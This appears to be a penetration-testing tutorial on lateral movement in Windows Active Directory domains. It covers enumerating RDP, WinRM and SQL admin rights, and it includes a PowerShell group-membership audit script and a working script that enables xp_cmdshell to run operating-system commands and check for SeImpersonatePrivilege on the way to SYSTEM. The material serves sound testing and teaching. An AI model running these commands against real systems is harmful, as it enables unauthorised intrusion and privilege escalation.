Lateral Movement: Windows Domain Security

When it comes to navigating the labyrinth of Active Directory environments, lateral movement is a critical skill for penetration testers. Once a foothold is established within a domain, the focus shifts to expanding access either through lateral or vertical movement to achieve domain compromise or other strategic objectives. This article explores some of the most effective techniques for lateral movement in Windows domains, leveraging tools like BloodHound, PowerView, and others to enumerate and exploit access rights.

The Art of Lateral Movement: Key Techniques

Lateral movement hinges on identifying and exploiting access pathways within a domain. If you’ve compromised an account with local admin rights on one or more hosts, techniques like Pass-the-Hash via the SMB protocol often come into play. But what if you lack such privileges? Here’s where alternative methods shine:

  • Remote Desktop Protocol (RDP): RDP provides GUI-based remote access to target hosts. Even without admin rights, accounts with RDP privileges can serve as valuable stepping stones.
  • PowerShell Remoting (WinRM): This protocol allows command execution or interactive sessions on remote hosts using PowerShell.
  • MSSQL Server Access: Accounts with sysadmin privileges on SQL Server instances can execute operating system commands via the SQL Server service account.

Each of these methods offers unique opportunities for privilege escalation, credential harvesting, and reconnaissance.

Enumerating Remote Access Privileges

Effective lateral movement begins with enumeration. Tools like BloodHound are indispensable for mapping out access pathways. For instance, BloodHound's edges CanRDP, CanPSRemote, and SQLAdmin reveal which users have remote access rights to specific hosts. Alternatively, PowerView and built-in Windows tools can be used for manual enumeration.

Example: Enumerating RDP Users

Using PowerView’s Get-NetLocalGroupMember function, you can identify members of the Remote Desktop Users group on a target host:

PS C:\htb> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users"

If all Domain Users (or Authenticated Users or Everyone) are granted RDP access to a host, this signals a significant security gap. Such hosts often serve as jump servers or Remote Desktop Services (RDS) environments and may contain sensitive data, cached credentials of other users, or local privilege escalation opportunities.

Exploiting Remote Management Protocols

WinRM Access

WinRM is another potent avenue for lateral movement. Accounts with membership in the Remote Management Users group can leverage WinRM without requiring local admin rights. Enumeration can be performed using PowerView:

PS C:\htb> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"

For exploitation, tools like evil-winrm (on Linux) or PowerShell’s Enter-PSSession cmdlet (on Windows) allow you to establish remote sessions and execute commands.
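The two PowerView commands above (for the Remote Desktop Users group and for the Remote Management Users group) are the same check against two groups. The script below is an added example, not code from the original article or from PowerView: it runs that check across a list of hosts and both groups and flags memberships that hand remote access to broad principals. It matches on well-known SIDs and RIDs rather than display names, so renamed or localised groups are still caught. It uses PowerView's Get-NetLocalGroupMember when that function is loaded and otherwise falls back to the built-in ADSI WinNT provider; the host names are assumptions.

```powershell
# Added example (not from the original article): audit the two local groups that grant
# non-admin remote access on a set of hosts and flag broad principals in them.
# Assumes: PowerView is dot-sourced (optional) and the caller may enumerate remote SAM groups.

# Well-known SIDs whose presence in a remote-access group is a finding on its own.
$BroadPrincipals = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
}
# Domain-relative RIDs: Domain Users (513) and Domain Computers (515).
$BroadDomainRids = @{ 513 = 'Domain Users'; 515 = 'Domain Computers' }

function Get-LocalGroupMembership {
    param([string]$ComputerName, [string]$GroupName)
    if (Get-Command Get-NetLocalGroupMember -ErrorAction SilentlyContinue) {
        # PowerView objects carry ComputerName, GroupName, MemberName, SID, IsGroup, IsDomain
        return Get-NetLocalGroupMember -ComputerName $ComputerName -GroupName $GroupName |
            Select-Object MemberName, SID
    }
    # Fallback: ADSI WinNT provider (SAMR over SMB; no WinRM needed on the target)
    $group = [ADSI]"WinNT://$ComputerName/$GroupName,group"
    foreach ($m in @($group.psbase.Invoke('Members'))) {
        $t        = $m.GetType()
        $adsPath  = $t.InvokeMember('AdsPath', 'GetProperty', $null, $m, $null)   # WinNT://DOMAIN/Name
        $sidBytes = [byte[]]$t.InvokeMember('objectSid', 'GetProperty', $null, $m, $null)
        [pscustomobject]@{
            MemberName = ($adsPath -replace '^WinNT://', '') -replace '/', '\'
            SID        = (New-Object System.Security.Principal.SecurityIdentifier($sidBytes, 0)).Value
        }
    }
}

function Test-BroadPrincipal {
    # Returns why a SID is "broad", or $null when it names a specific user or group.
    param([string]$Sid)
    if ($BroadPrincipals.ContainsKey($Sid)) { return $BroadPrincipals[$Sid] }
    if ($Sid -match '^S-1-5-21-\d+-\d+-\d+-(\d+)$') {
        $rid = [int]$Matches[1]
        if ($BroadDomainRids.ContainsKey($rid)) { return $BroadDomainRids[$rid] }
    }
    return $null
}

function Invoke-RemoteAccessAudit {
    param(
        [Parameter(Mandatory)][string[]]$ComputerName,
        [string[]]$GroupName = @('Remote Desktop Users', 'Remote Management Users')
    )
    foreach ($c in $ComputerName) {
        foreach ($g in $GroupName) {
            try   { $members = @(Get-LocalGroupMembership -ComputerName $c -GroupName $g) }
            catch { Write-Warning "$c / $g : $($_.Exception.Message)"; continue }
            foreach ($m in $members) {
                $why     = Test-BroadPrincipal -Sid $m.SID
                $finding = if ($why) { "broad principal: $why" } else { '' }
                [pscustomobject]@{
                    ComputerName = $c
                    GroupName    = $g
                    MemberName   = $m.MemberName
                    SID          = $m.SID
                    Finding      = $finding
                }
            }
        }
    }
}

# Usage (host name is an assumption). Every row is a stepping stone for a principal you
# control; rows with a non-empty Finding are the jump-host style misconfiguration the text describes.
Invoke-RemoteAccessAudit -ComputerName 'ACADEMY-EA-MS01' |
    Format-Table ComputerName, GroupName, MemberName, Finding -AutoSize
```

Two caveats a practitioner should expect. Remote SAM enumeration is restricted to local administrators by default on Windows 10 1607 / Server 2016 and later ("Network access: Restrict clients allowed to make remote calls to SAM"), so a low-privileged account may get access denied where BloodHound, collected earlier with a better-placed account, still shows CanRDP or CanPSRemote edges. And a hit on Remote Management Users only matters if the WinRM listener is actually up (TCP 5985/5986); the same goes for RDP and TCP 3389.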

SQL Server Admin Privileges

SQL servers are ubiquitous in enterprise environments and often house accounts with excessive privileges. Credentials obtained through techniques like Kerberoasting or LLMNR/NBT-NS spoofing can be used to authenticate against SQL servers. Tools such as PowerUpSQL or Impacket’s mssqlclient.py enable enumeration and exploitation of SQL instances.

For example, after identifying an account with sysadmin privileges using BloodHound:

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group))
MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer)
RETURN p2

You can authenticate with Impacket's mssqlclient.py and execute operating system commands via SQL Server's xp_cmdshell feature. enable_xp_cmdshell is a client-side helper that turns the option on through sp_configure; xp_cmdshell is disabled by default and needs sysadmin rights to enable:

SQL> enable_xp_cmdshell
SQL> xp_cmdshell 'whoami /priv'

The command runs in the context of the SQL Server service account, not the SQL login you authenticated with. If whoami /priv shows SeImpersonatePrivilege enabled for that account, which is common for service accounts, a potato-style token impersonation attack typically yields SYSTEM on the database host.
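The mssqlclient.py helpers above hide the actual T-SQL. The following is an added example, not code from the original article or from Impacket or PowerUpSQL, that performs the same steps from PowerShell with .NET's SqlClient so the queries are visible: it refuses to proceed unless the login is sysadmin, reports the service account whose token the command will run under, enables xp_cmdshell, runs the command, and then checks the output for SeImpersonatePrivilege. The instance name and credentials are assumptions.

```powershell
# Added example (not from the original article): the T-SQL behind enable_xp_cmdshell and
# xp_cmdshell, with the two checks a tester wants first (sysadmin? which service account?).
# Assumes a reachable instance and a sysadmin login; instance name below is made up.

function Invoke-SqlOsCommand {
    param(
        [Parameter(Mandatory)][string]$Instance,    # 'host', 'host\INSTANCE' or 'host,1433'
        [Parameter(Mandatory)][string]$Command,
        [pscredential]$Credential                    # SQL login; omit for Windows integrated auth
    )
    $cs = "Server=$Instance;Database=master;"
    if ($Credential) {
        $cs += "User ID=$($Credential.UserName);Password=$($Credential.GetNetworkCredential().Password);"
    } else {
        $cs += 'Integrated Security=SSPI;'
    }
    $conn = New-Object System.Data.SqlClient.SqlConnection($cs)
    $conn.Open()
    try {
        $cmd = $conn.CreateCommand()

        # 1. Bail out early unless the login is sysadmin (sp_configure requires it).
        $cmd.CommandText = "SELECT IS_SRVROLEMEMBER('sysadmin')"
        if ([int]$cmd.ExecuteScalar() -ne 1) { throw "Login is not sysadmin on $Instance" }

        # 2. Whose token will the OS command run under? The SQL Server service account.
        $cmd.CommandText = "SELECT service_account FROM sys.dm_server_services WHERE servicename LIKE 'SQL Server (%'"
        Write-Verbose "xp_cmdshell will run as service account: $($cmd.ExecuteScalar())"

        # 3. What enable_xp_cmdshell does. Defenders: SQL Server writes
        #    "Configuration option 'xp_cmdshell' changed from 0 to 1" to its error log.
        $cmd.CommandText = @"
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
"@
        [void]$cmd.ExecuteNonQuery()

        # 4. Run the command; each output line is a row, followed by a trailing NULL row.
        $cmd.CommandText = 'EXEC master..xp_cmdshell @cmd'
        [void]$cmd.Parameters.AddWithValue('@cmd', $Command)
        $reader = $cmd.ExecuteReader()
        $lines = while ($reader.Read()) { if (-not $reader.IsDBNull(0)) { $reader.GetString(0) } }
        $reader.Close()
        return @($lines)
    }
    finally { $conn.Close() }
}

function Test-ImpersonatePrivilege {
    # True when 'whoami /priv' output lists SeImpersonatePrivilege as Enabled: the precondition
    # for a potato-style token impersonation escalation from the service account to SYSTEM.
    param([string[]]$WhoamiPrivOutput)
    return [bool]($WhoamiPrivOutput | Where-Object { $_ -match '^SeImpersonatePrivilege\s.*\bEnabled\s*$' })
}

# Usage (instance name is an assumption; add -Credential for a SQL login)
$out = Invoke-SqlOsCommand -Instance 'ACADEMY-EA-DB01' -Command 'whoami /priv' -Verbose
$out
if (Test-ImpersonatePrivilege $out) {
    'Service account holds SeImpersonatePrivilege: SYSTEM is one token-impersonation step away'
}
```

The sysadmin check up front avoids a noisy failed sp_configure on an account that only has lower SQL rights, and sys.dm_server_services (SQL Server 2008 R2 SP1 and later) tells you whether the service runs as a domain account, whose credentials are then worth harvesting, or as a virtual account.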

Iterative Enumeration and Exploitation

Penetration testing is an iterative process. Each successful compromise should trigger a fresh round of enumeration to uncover new access rights and privileges. For example:

  1. Use BloodHound to identify execution rights such as RDP or WinRM.
  2. Check for SQLAdmin privileges that could provide SYSTEM-level access.
  3. Reassess newly compromised accounts for additional lateral movement opportunities.

Practical Tools for Penetration Testers

Here’s a quick rundown of essential tools:

  • BloodHound: Visualises Active Directory relationships and identifies attack paths.
  • PowerView: Enumerates domain information from Windows hosts.
  • evil-winrm: Simplifies WinRM exploitation from Linux attack hosts.
  • PowerUpSQL: Facilitates enumeration and exploitation of MSSQL servers.
  • Impacket Toolkit: Offers versatile tools like mssqlclient.py for SQL server attacks.

Conclusion: The Road to Domain Compromise

Lateral movement is not just about exploiting technical vulnerabilities, it’s about understanding how permissions and configurations intersect within an Active Directory environment. By systematically enumerating remote access rights, leveraging tools like BloodHound, and exploiting protocols such as RDP, WinRM, and MSSQL, penetration testers can methodically advance toward their goals.

For defenders (blue teams), these same techniques underscore the importance of regular audits to identify misconfigurations, such as broad groups (Domain Users, Authenticated Users) in the local Remote Desktop Users or Remote Management Users groups, or xp_cmdshell enabled on production instances, and to mitigate the risks before attackers exploit them.

In the end, whether you’re a penetration tester probing for weaknesses or a defender shoring up defences, mastering lateral movement techniques is essential for navigating today’s complex enterprise networks.
